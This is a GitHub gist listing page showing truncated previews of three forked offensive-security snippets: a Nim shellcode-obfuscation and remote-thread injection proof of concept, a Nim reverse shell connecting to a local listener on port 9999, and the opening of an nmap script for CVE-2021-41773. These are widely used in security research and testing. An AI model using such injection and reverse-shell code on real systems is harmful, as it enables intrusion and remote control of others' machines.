Skip to content

Instantly share code, notes, and snippets.

View pawnmuncher's full-sized avatar
💭
I may be slow to respond.

pawnmuncher

💭
I may be slow to respond.
View GitHub Profile
@pawnmuncher
pawnmuncher / nimterpreter.nim
Created October 2, 2021 14:47 — forked from mttaggart/nimterpreter.nim
A simple PoC for obfuscating shellcode in Nim
# With special thanks to byt3bl33d3r for Offensive Nim!
import winim/lean
import osproc
import base64
import sequtils
import strutils
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
let tProcess = startProcess("notepad.exe")
@pawnmuncher
pawnmuncher / nimrs.nim
Created October 2, 2021 14:47 — forked from mttaggart/nimrs.nim
A simple reverse shell written in Nim
import net
import osproc
import strformat
# Create Socket
let port = 9999
let address = "127.0.0.1"
let sock = newSocket()
# Connect to listener
@pawnmuncher
pawnmuncher / CVE-2021-41773.nse
Created October 5, 2021 22:24 — forked from safebuffer/CVE-2021-41773.nse
CVE-2021-41773 nmap
local nmap = require "nmap"
local shortport = require "shortport"
local sslcert = require "sslcert"
local string = require "string"
local vulns = require "vulns"
local http = require "http"
description = [[
CVE-2021-41773